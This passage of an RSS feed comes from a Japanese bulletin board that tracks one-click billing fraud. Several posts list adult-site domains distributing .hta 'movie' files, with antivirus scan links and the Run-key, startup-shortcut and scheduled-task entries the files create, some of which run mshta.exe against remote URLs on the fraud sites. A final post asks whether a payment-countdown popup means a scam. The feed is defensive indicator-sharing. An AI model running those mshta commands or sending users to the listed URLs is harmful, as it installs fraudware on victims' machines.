href="http://www.virustotal.com/file-scan/report.html?id=f4b1b53ed6c07a337d65d1c9abde3b967bd5c34274a75ef95637d8567c79616c-1326370534" target="_blank">http://www.virustotal.com/file-scan/report.html?id=f4b1b53ed6c07a337d65d1c9abde3b967bd5c34274a75ef95637d8567c79616c-1326370534</a>    C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2] C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs   Startup on Registory   HKCU:Run odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2 C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs   Task Scheduler library　  &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs&lt;/Command&gt;        </description>
  <dc:date>2012-01-08T19:46+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>JPPorn</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://av-porn.info/" target="_blank">http://av-porn.info/</a>  File name 「MovieID_KpUzK5fptCxTWTYXRidhYP5nhatuiC8N.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=f5b31335fefa7d46bab89c6985d7c097eaf8a6b29ac990b5bf63c75e0499a3b6-1325411290" target="_blank">http://www.virustotal.com/file-scan/report.html?id=f5b31335fefa7d46bab89c6985d7c097eaf8a6b29ac990b5bf63c75e0499a3b6-1325411290</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootKpUzK5fptCxTWTYXRidhYP5nhatuiC8N] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteKpUzK5fptCxTWTYXRidhYP5nhatuiC8N] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N" target="_blank">http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N</a>   The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\htmlapp.exe <a href="http://av-porn.info/reg2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N" target="_blank">http://av-porn.info/reg2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N</a>   Startup on Registory  HKCU:Run RegWriteKpUzK5fptCxTWTYXRidhYP5nhatuiC8N C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootKpUzK5fptCxTWTYXRidhYP5nhatuiC8N C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N&lt;/Arguments&gt;" target="_blank">http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N&lt;/Arguments&gt;</a>   --------------------------------------------------------  <a href="http://olive-porn.info/" target="_blank">http://olive-porn.info/</a>  File name 「MovieID_WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=2e9fddcae84fcb8670fc832ff939495c91ceb63b5c20de445439b8ff905af494-1325763145" target="_blank">http://www.virustotal.com/file-scan/report.html?id=2e9fddcae84fcb8670fc832ff939495c91ceb63b5c20de445439b8ff905af494-1325763145</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c" target="_blank">http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c</a>  The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\htmlapp.exe <a href="http://olive-porn.info/reg2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c" target="_blank">http://olive-porn.info/reg2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c</a>  Startup on Registory  HKCU:Run RegWriteWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library　 &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c&lt;/Arguments&gt;" target="_blank">http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c&lt;/Arguments&gt;</a>       </description>
  <dc:date>2012-01-01T23:01+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>エッチ動画</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://cynical.boronplanet.net/" target="_blank">http://cynical.boronplanet.net/</a> <a href="http://boronplanet.net/" target="_blank">http://boronplanet.net/</a> <a href="http://" target="_blank">http://</a>*.boronplanet.net/  File name 「ahegaow_1324888643.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=0aa8310d4dc613a2d722696d3216a91924386820344bcfacfa62ae02bf9e71db-1324888294" target="_blank">http://www.virustotal.com/file-scan/report.html?id=0aa8310d4dc613a2d722696d3216a91924386820344bcfacfa62ae02bf9e71db-1324888294</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603] C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs  Startup on Registor  HKCU:Run peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603 C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs&lt;/Command&gt;   </description>
  <dc:date>2011-12-26T18:25+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>アダルト見放題</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://comet.greatbearlily.net/" target="_blank">http://comet.greatbearlily.net/</a> <a href="http://greatbearlily.net/" target="_blank">http://greatbearlily.net/</a> <a href="http://" target="_blank">http://</a>*.greatbearlily.net/  File name 「erobody_1324639546.hta」 <a href="http://r.virscan.org/8344324a1eda8b3da95ee3ce50704a8b" target="_blank">http://r.virscan.org/8344324a1eda8b3da95ee3ce50704a8b</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs  Startup on Registory  KCU:Run onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Media&lt;/Command&gt;    &lt;Arguments&gt;Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs&lt;/Arguments&gt;     </description>
  <dc:date>2011-12-23T22:14+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>教えてください</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description><a href="http://" target="_blank">http://</a>　www.pomdora.com/ 上記サイトの情報が無いので質問させてください 支払期限カウントダウンの消えないポップアップが出ました （それに関しては削除ツールを使用して消しました）  ワンクリ詐欺サイトなんでしょうか 動画は4秒で終了でしたが出ました 興味本位で知らないサイトを使うもんじゃないと後悔しました  このまま無視を決め込んで大丈夫なサイトなのかどうか教えていただければ有難いです</description>
  <dc:date>2011-12-22T11:56+09:00</dc:date>
 </item>
</rdf:RDF>

